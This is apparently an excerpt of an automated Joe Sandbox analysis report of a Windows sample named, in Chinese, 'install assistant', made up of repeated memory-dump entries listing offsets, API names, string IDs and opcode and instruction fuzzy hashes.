                                 • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1954651204.000000006CBF2000.00000002.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: ExceptionFeaturePresentProcessorRaisestd::invalid_argument::invalid_argument
                                • String ID:
                                • API String ID: 915016180-0
                                • Opcode ID: 6557e4bee38ca065957fc12ce6aee638f4ff0a29f953b79c59ec8e8b0cc16256
                                • Instruction ID: 776b0d9154619ba76fd829ef56b174ab8d634f937b20f4abf4e288ed899b70dc
                                • Opcode Fuzzy Hash: 6557e4bee38ca065957fc12ce6aee638f4ff0a29f953b79c59ec8e8b0cc16256
                                • Instruction Fuzzy Hash: 8EB1BC71F052099BCB05CF64D8C5A9DBBB4FB59358F28822ED415EB790D3389988CF94
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA38000, based on PE: true
                                 • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID:
                                • String ID: @4J$DsL
                                • API String ID: 0-2004129199
                                • Opcode ID: 9b82dfd3553fe836d7aa24bd6b5882a619f6ea42a248f1f14d7e615b1deddf65
                                • Instruction ID: a518cc5f7f8b0d180ac6ab4a03eaaa4b583e0da6459ae508d2b188504f7c5e80
                                • Opcode Fuzzy Hash: 9b82dfd3553fe836d7aa24bd6b5882a619f6ea42a248f1f14d7e615b1deddf65
                                • Instruction Fuzzy Hash: B7219E37AA49560BD74CCA68EC33EB92681E745305B89527EE94BCB3E1DF6C9800C648
                                APIs
                                • __EH_prolog.LIBCMT ref: 6CA5540F
                                  • Part of subcall function 6CA56137: __EH_prolog.LIBCMT ref: 6CA5613C
                                Memory Dump Source
                                • Source File: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA38000, based on PE: true
                                 • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: H_prolog
                                • String ID:
                                • API String ID: 3519838083-0
                                • Opcode ID: 8552379c3bb9a98a981715b0c2d56659a9b66d2cd3d1a4f2db75c79318028cc2
                                • Instruction ID: 09d7f5a10eb98de8cfa5479442b5bfc7af20c4141bf6b2443de8dedaa0f43964
                                • Opcode Fuzzy Hash: 8552379c3bb9a98a981715b0c2d56659a9b66d2cd3d1a4f2db75c79318028cc2
                                • Instruction Fuzzy Hash: 5B626A71D00259CFDF15CFA4C994BEDBBB1BF04318F58816AE815ABA80D7749A98CF90
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA38000, based on PE: true
                                 • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID:
                                • String ID: YA1
                                • API String ID: 0-613462611
                                • Opcode ID: df9d50bcc828b940dfae17b14b827ef815617663f23fa9b0dba43a4edbf83f29
                                • Instruction ID: c74f19d973dacd6496ae5cbccff6b0485c80597ad4b5ab70b60244e99dac08df
                                • Opcode Fuzzy Hash: df9d50bcc828b940dfae17b14b827ef815617663f23fa9b0dba43a4edbf83f29
                                • Instruction Fuzzy Hash: 7E42C370A093818FC315CF69C49069ABBE2FFD9308F18496DE8D58B751D671D98BCB82
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA38000, based on PE: true
                                 • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: __aullrem
                                • String ID:
                                • API String ID: 3758378126-0
                                • Opcode ID: d1b669466a100d6f0f6c84f42758606c7eb5b4ffe16e73214497a835af333093
                                • Instruction ID: daa3cd17540356e05e4ddd492aa131c43cf921dc159559792440232c57013cd8
                                • Opcode Fuzzy Hash: d1b669466a100d6f0f6c84f42758606c7eb5b4ffe16e73214497a835af333093
                                • Instruction Fuzzy Hash: A951D871A052859BD710CF5AC4C06EEFBF6EF79214F28C05EE8C897242D27A599EC760
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA38000, based on PE: true
                                 • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID: 0-3916222277
                                • Opcode ID: acb8407a1b1d291f125d5a9761f4a1fdf91c25411dab1fb78ed15b47a431c268
                                • Instruction ID: 1d7be294e91cbebf2916a5bac3efc74fe5422f94113400a24de7601c953dd368
                                • Opcode Fuzzy Hash: acb8407a1b1d291f125d5a9761f4a1fdf91c25411dab1fb78ed15b47a431c268
                                • Instruction Fuzzy Hash: A9029C356083808BD325CF29C59079EBBE6FFC8318F184A2DE4C5A7B51D7759989CB82
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA38000, based on PE: true
                                 • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID:
                                • String ID: (SL
                                • API String ID: 0-669240678
                                • Opcode ID: 403d64dc1b872b29255918294ce527b86f393edeaddcf848938bb8168c435548
                                • Instruction ID: 919c2d627a58f6c89bd1fbba4de433de19c6cfc8fa707b4e1eb6873ea05431de
                                • Opcode Fuzzy Hash: 403d64dc1b872b29255918294ce527b86f393edeaddcf848938bb8168c435548
                                • Instruction Fuzzy Hash: 17518573E208314AD78CCE24DC2177572D2E784310F8BC1B99D4BAB6E6DD78689587D4
                                Memory Dump Source
                                • Source File: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA38000, based on PE: true
                                 • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3901934d13cb486671902a8639e4417b1e8cd50483714420dc8c7fa42b5c990c
                                • Instruction ID: 955097934a04af855c43954357201208396761589411d070f8d6ebe6a585add5
                                • Opcode Fuzzy Hash: 3901934d13cb486671902a8639e4417b1e8cd50483714420dc8c7fa42b5c990c
                                • Instruction Fuzzy Hash: 18526271204B858BD318CF29C6906AAF7E6BF95308F188A2DD4DAD7B41DB74F489CB41
                                Memory Dump Source
                                • Source File: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA38000, based on PE: true
                                 • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bb173c08d896bf76c8f12b9495eb2c2eeed1eb95d4f1202fd14126b970d45cbc
                                • Instruction ID: 8a3e3e6d75776303da235dd6a3aafb9c4350824d5d41b6b2cffa1be364a218fa
                                • Opcode Fuzzy Hash: bb173c08d896bf76c8f12b9495eb2c2eeed1eb95d4f1202fd14126b970d45cbc
                                • Instruction Fuzzy Hash: C162F2B1A083448FC714CF19D58062ABBF6BFC8744F188A2EE89997714D771E885CB93
                                Memory Dump Source
                                • Source File: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA38000, based on PE: true
                                 • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ae17103ab74f7c7ba27116ddf20acfa1a33030b9793f89cfab32f42cff4eb5f1
                                • Instruction ID: 630cf32f291adb5512db911f9d31b6d9539d2a8587bcc01d1e90a99040f28bc7
                                • Opcode Fuzzy Hash: ae17103ab74f7c7ba27116ddf20acfa1a33030b9793f89cfab32f42cff4eb5f1
                                • Instruction Fuzzy Hash: 6512BE712097418FC718CF69C59066AFBE6BFC8304F58892DE9D69BB41DB31E889CB41
                                Memory Dump Source
                                • Source File: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA38000, based on PE: true
                                 • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f4c3878cdf6dda1e5ca36c24f377bc52bcf6993d29949e9196dea34e7f5de905
                                • Instruction ID: 1a4fc5b3c8ef2cc558300ed7b843f6796a8486cd74cf86e9a7bbf0139aeb4fa5
                                • Opcode Fuzzy Hash: f4c3878cdf6dda1e5ca36c24f377bc52bcf6993d29949e9196dea34e7f5de905
                                • Instruction Fuzzy Hash: 1402E632B082118BD319CE2DC490269BBF2FBC4355F194B2EE89697A94D77498C4CB97
                                Memory Dump Source
                                • Source File: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA38000, based on PE: true
                                 • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1d22da7b9f01d20fe9c2b0fcfce1f7ad9ec50e907d9644d55dcb606a953bfaed
                                • Instruction ID: 8daab90f5ae649ce00add71bd03fd555be04f66e871c7750d1c5b7cf0cbebb27
                                • Opcode Fuzzy Hash: 1d22da7b9f01d20fe9c2b0fcfce1f7ad9ec50e907d9644d55dcb606a953bfaed
                                • Instruction Fuzzy Hash: 16F1E1326042898FEB28CE68D8507EEB7E2FBC5314F58453DD889CBB41DB35958AC791
                                Memory Dump Source
                                • Source File: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA38000, based on PE: true
                                 • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 37fe9a4fd3af81bafc73f8bd31f63684d8e342a2009f8b6bc144f44596592570
                                • Instruction ID: f023e1baf22b7cce817a9701ff824637c4f7196eaea017f2c1d67138deffcb93
                                • Opcode Fuzzy Hash: 37fe9a4fd3af81bafc73f8bd31f63684d8e342a2009f8b6bc144f44596592570
                                • Instruction Fuzzy Hash: 69D131795046028FD318CF5DC8A4236BBE5FF86304F0D4ABDDAA29B79AD7349685CB40
                                Memory Dump Source
                                • Source File: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA38000, based on PE: true
                                • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ae4b2f2b70234ac2bedfdde99fbf7177c16b95a6c2c71cfcccbd0d12063c7eec
                                • Instruction ID: 4e157c2fac62124f059e66057d689e0bc21a9e2bb25053f3b14e9ab8989b6726
                                • Opcode Fuzzy Hash: ae4b2f2b70234ac2bedfdde99fbf7177c16b95a6c2c71cfcccbd0d12063c7eec
                                • Instruction Fuzzy Hash: 38C1D3352047418BC719CE3DD0A4297BBE6EFDA314F148A6EC4CE4BB55DA30A88ECB55
                                Memory Dump Source
                                • Source File: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA38000, based on PE: true
                                • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d6cb5a5b9c3abea019be7d104db6e1742bcc809bf8f8dd5f8f219f0a705516a1
                                • Instruction ID: 6fd25be2acf4618e24ac885276f599d1a3e11173cbdbe3d707e6791204f44fdc
                                • Opcode Fuzzy Hash: d6cb5a5b9c3abea019be7d104db6e1742bcc809bf8f8dd5f8f219f0a705516a1
                                • Instruction Fuzzy Hash: 7DB1C231304B054BD324DFB9C9907EAB7E1AF85708F04852DC9AA87781EF31A98EC795
                                Memory Dump Source
                                • Source File: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA38000, based on PE: true
                                • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a42b4b82a53dfb7125c27c391958f90512e79f572afba738efee2a2e68b245a2
                                • Instruction ID: da21119af4d018e106e9e3a1fd536cb599d388bf5a7475e78994fecd712e36fd
                                • Opcode Fuzzy Hash: a42b4b82a53dfb7125c27c391958f90512e79f572afba738efee2a2e68b245a2
                                • Instruction Fuzzy Hash: 1FB1AC756087028BC304DF29C8806ABF7E2FFC8304F18892DE599D7715E771A59ACBA5
                                Memory Dump Source
                                • Source File: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA38000, based on PE: true
                                • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 57f28dc9a1232a8c06b083a4d088c40ef3b8ca8235aec33933a76f5351274b3b
                                • Instruction ID: 0a86f8e6adaa031e22800c51df8320c1722f82bc0daffd00ee7f6eafcc7202d5
                                • Opcode Fuzzy Hash: 57f28dc9a1232a8c06b083a4d088c40ef3b8ca8235aec33933a76f5351274b3b
                                • Instruction Fuzzy Hash: 26A1D77160C7418FC314CE3AC69069ABBF5ABE5308F584A2DE4D6A7741D731E98ACB42
                                Memory Dump Source
                                • Source File: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA38000, based on PE: true
                                • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b96a3bfa2f071fda60c0812de3eea8bd7f1a293af8749856eb5c89b36b6714e8
                                • Instruction ID: 2040337d410c33dd70afdfa1fe31e90809ed4eedd779a915e24ee286a79254bd
                                • Opcode Fuzzy Hash: b96a3bfa2f071fda60c0812de3eea8bd7f1a293af8749856eb5c89b36b6714e8
                                • Instruction Fuzzy Hash: 6A81B135A087058FC320CF29C180246B7F5FFA9704F28CA6DC599AB715E772E986CB81
                                Memory Dump Source
                                • Source File: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA38000, based on PE: true
                                • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e7510d37d1dc4b924ec4f7ba8427fb7a6be5c38a378ebc779dfd7017bf70bacd
                                • Instruction ID: 2fb4aaad2a50153cc166f19dbf76030aac88bd595653a32c255243a54ec944a5
                                • Opcode Fuzzy Hash: e7510d37d1dc4b924ec4f7ba8427fb7a6be5c38a378ebc779dfd7017bf70bacd
                                • Instruction Fuzzy Hash: B951AE72F006099FDB08CE98DDA16EDBBF2EB89308F688169D411E7781D7749A91CB40
                                Memory Dump Source
                                • Source File: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA38000, based on PE: true
                                • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 72c1d2a683874879174d131ccb4dddd1e2f70cb764b1e7878fe2ff4eea78678e
                                • Instruction ID: 020c2a2eb88cbeb5b5ddc404fae1482e117d9ca62ad7486ee233f3d6f0779893
                                • Opcode Fuzzy Hash: 72c1d2a683874879174d131ccb4dddd1e2f70cb764b1e7878fe2ff4eea78678e
                                • Instruction Fuzzy Hash: D53114277A440103D70CCD3BCC5679F91635BD462A74ECF396C05DEF55D52CC8664144
                                Memory Dump Source
                                • Source File: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA38000, based on PE: true
                                • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f18cd9d9e139bd055bb212acf8773c3fe54c7ac8df6eb17b1ef3fe2716829738
                                • Instruction ID: 41ecf2473510b4d2bda55b6de4a1c59a540243f358786245b0e3b22787684d37
                                • Opcode Fuzzy Hash: f18cd9d9e139bd055bb212acf8773c3fe54c7ac8df6eb17b1ef3fe2716829738
                                • Instruction Fuzzy Hash: 07219077320A0647E74C8A38D93737532D0A705318F98A62DEA6BCE2C2D73AC457C385
                                Memory Dump Source
                                • Source File: 00000005.00000002.1951906394.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                • Associated: 00000005.00000002.1951876229.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                • Associated: 00000005.00000002.1953185042.000000006CA28000.00000002.00000001.01000000.00000009.sdmp
                                • Associated: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp
                                • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                • Associated: 00000005.00000002.1954651204.000000006CBF2000.00000002.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 625bd1896752f3410a16568d0b0fc24f2ed9bb8968b98bc14c700bb3fa862af5
                                • Instruction ID: b5ebedd839e288926e1681b2745d0ae9f8b5544b954c4bdb45436efa9c51a3ec
                                • Opcode Fuzzy Hash: 625bd1896752f3410a16568d0b0fc24f2ed9bb8968b98bc14c700bb3fa862af5
                                • Instruction Fuzzy Hash: 09F0E532E28324DBCB12DB5CD505B8973BDEB45B65F154096E404DBA40C3B0DD84C7C4
                                Memory Dump Source
                                • Source File: 00000005.00000002.1951906394.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                • Associated: 00000005.00000002.1951876229.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                • Associated: 00000005.00000002.1953185042.000000006CA28000.00000002.00000001.01000000.00000009.sdmp
                                • Associated: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp
                                • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                • Associated: 00000005.00000002.1954651204.000000006CBF2000.00000002.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1cade3b8bd37eadd8f509832e5cf264ebb44d36771f29a864de074982515b943
                                • Instruction ID: 4764859fd4b29ecc7b1b0e9639090c85a9d6f50d5210855ea9ce913c2f7cb3bc
                                • Opcode Fuzzy Hash: 1cade3b8bd37eadd8f509832e5cf264ebb44d36771f29a864de074982515b943
                                • Instruction Fuzzy Hash: A0E08C72A2A238EBCB15EBA8CA00D8AB3FCEB44A05B114096B501D3A10D270DE44C7D0
                                Memory Dump Source
                                • Source File: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA38000, based on PE: true
                                • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d8b2ce9af6ca23b39d287f27f794cd19cdb7301d321a8ca7d0b17b1edfa8364a
                                • Instruction ID: e66f581e1d426f6db11500287d95422d623ba7d2b23dc96e6278d100bc2a46bf
                                • Opcode Fuzzy Hash: d8b2ce9af6ca23b39d287f27f794cd19cdb7301d321a8ca7d0b17b1edfa8364a
                                • Instruction Fuzzy Hash: F5C08CA312810017C306EA2598C0BAAF6A37360330F268C2EA0A2F7E43C329D0A48111
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA38000, based on PE: true
                                • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: H_prolog
                                • String ID: @$p&L$p&L$p&L$p&L$p&L$p&L$p&L$p&L
                                • API String ID: 3519838083-609671
                                • Opcode ID: 484af5ae81cb977d174bd25b2e3a21fa57463062f16cd0331cc52001b19bc208
                                • Instruction ID: 4065fadf75f22ee70bf94474edd1166eb3874a6b0565a3406a7a743bc7c228de
                                • Opcode Fuzzy Hash: 484af5ae81cb977d174bd25b2e3a21fa57463062f16cd0331cc52001b19bc208
                                • Instruction Fuzzy Hash: 77D18271A04209EFCB15CFA5DE90BEEB7B5FF05308F148519E055A7E90DB709988CBA0
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA38000, based on PE: true
                                • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: __aulldiv$H_prolog
                                • String ID: >WJ$x$x
                                • API String ID: 2300968129-3162267903
                                • Opcode ID: 949a4121937ebe046e830a9d183576ad129ffcf0ce56193b78953cd7febb835e
                                • Instruction ID: df0f9e2e233729e75483fa31ed01c7b27632c18847c41c15a1fdb8a507066693
                                • Opcode Fuzzy Hash: 949a4121937ebe046e830a9d183576ad129ffcf0ce56193b78953cd7febb835e
                                • Instruction Fuzzy Hash: 3E127671900209EFDF14CFA4C980AEDBBB5FF08318F648169E919EB750DB35A999CB50
                                APIs
                                • _ValidateLocalCookies.LIBCMT ref: 6CA09B07
                                • ___except_validate_context_record.LIBVCRUNTIME ref: 6CA09B0F
                                • _ValidateLocalCookies.LIBCMT ref: 6CA09B98
                                • __IsNonwritableInCurrentImage.LIBCMT ref: 6CA09BC3
                                • _ValidateLocalCookies.LIBCMT ref: 6CA09C18
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1951906394.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                • Associated: 00000005.00000002.1951876229.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                • Associated: 00000005.00000002.1953185042.000000006CA28000.00000002.00000001.01000000.00000009.sdmp
                                • Associated: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp
                                • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                • Associated: 00000005.00000002.1954651204.000000006CBF2000.00000002.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                • String ID: csm
                                • API String ID: 1170836740-1018135373
                                • Opcode ID: 950a48116a93723893591f982474aa918089014ff9c60bb953dfc150818eb1be
                                • Instruction ID: 8bff1977d578f796cfb4b7cec00621cec8fdaf6edbba498ecbe36b7d278753bc
                                • Opcode Fuzzy Hash: 950a48116a93723893591f982474aa918089014ff9c60bb953dfc150818eb1be
